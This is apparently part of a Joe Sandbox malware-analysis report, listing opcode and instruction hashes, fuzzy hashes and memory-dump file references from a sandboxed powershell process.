                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b62ed69039c27b2bf9e6abf9b8821e9ee82a12b7a95f57a6e2ae03f7eaaec66e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BD01730A0820A9FCB18EFA4E8468AEBBB9BB44304F004169DE0A93740EA305D01CBC2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fd3b29b15879c52143858e050371fafc1b34a13589977c24543018d17797e6d0
                                                                                                                                                                                                                                • Instruction ID: 21f11c193313cb71286bb78cf4e01ec5916d43311d14422130dcd29c2fce9619
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd3b29b15879c52143858e050371fafc1b34a13589977c24543018d17797e6d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D09239B44218CFCB04CBA4E895ADDB771FF84315F208065E5159B351CB32A912CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0292f4fc6bed3ce168fb1cd3b2b3597a063fe420c5e13f0ebd634a9b6db54b36
                                                                                                                                                                                                                                • Instruction ID: ce5566596fa262cd1a494b9b0b4c8112f5cbcf01cc8ec7e4baec828ff0f96f1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0292f4fc6bed3ce168fb1cd3b2b3597a063fe420c5e13f0ebd634a9b6db54b36
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BC08C104083804EEF0687306C2E4047F74EE87301B0626C3C90A8B1B3DD288800D321
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7a736786f6e756335220a9528fc7cac27dcb1a3688b2de4f02e9a4528ec298c1
                                                                                                                                                                                                                                • Instruction ID: c0d6abc0a35430f9f6afdd6516d036ba648c82afe807fa006d141ca9e4680065
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a736786f6e756335220a9528fc7cac27dcb1a3688b2de4f02e9a4528ec298c1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65C012390452899FCB199B78E088888BB30AF91219711099EE80A4A2A3CA73C44ACB20
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8cd65c672606b667d69d1f95b9611608d23d95377b0ac09b9ec844bb1458e477
                                                                                                                                                                                                                                • Instruction ID: e3a505a78e9552d5dfded108e67ea4ff2598aa2d177cbc66a4ecaab15c0124d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cd65c672606b667d69d1f95b9611608d23d95377b0ac09b9ec844bb1458e477
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B0923504470D8FC299AF79E4088147329BB8021938008A9EA0E0A2938E36E889CA45
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                                                                                • API String ID: 0-445857065
                                                                                                                                                                                                                                • Opcode ID: 126e12c041d6809e04d1226d334a1356ef78291995b2b92cc8705a1f2c314df0
                                                                                                                                                                                                                                • Instruction ID: 10f8e80629e60bf75a5a9aac4a1b6ad8790c815d704bb3ac19375642b407d4a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 126e12c041d6809e04d1226d334a1356ef78291995b2b92cc8705a1f2c314df0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2D136B1B0020A8FC725DB6A944466ABBE6AFC5320F1884BFD515CF256DB31CA86C791